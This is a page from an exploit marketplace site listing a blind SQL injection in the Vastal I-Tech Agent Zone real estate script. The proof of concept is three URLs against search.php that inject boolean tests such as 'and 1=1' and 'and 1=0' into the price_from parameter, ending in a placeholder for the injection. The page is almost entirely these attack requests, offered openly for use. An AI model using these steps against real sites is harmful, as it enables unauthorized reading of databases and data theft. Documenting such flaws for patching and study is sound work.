[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Vastal I-Tech Agent Zone (search.php) Blind SQL Injection Vulnerability

Author
Muhammet Cagri
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-17465
Category
web applications
Date add
31-01-2012
Platform
php
Agent Zone Vastal I-Tech Blind SQL Injection Vulnerability
# Date: 31.01.2012
# Author: Cagri Tepebasili
# Software : http://www.vastal.com/agent-zone-real-estate-script.html
# Tested on: Linux Mint 12
#####################################################################################################################
The First Step >>>
http://server/real/search.php?price_from=1000000.00+and+1=1&price_to=10000000.00
The Second Step >>>
http://server/real/search.php?price_from=1000000.00+and+1=0&price_to=10000000.00
Injection >>>
http://server/real/search.php?price_from=1000000.00[BlindSQLI]&price_to=10000000.00
Greetz : MythSEC <<<



#  0day.today [2024-12-25]  #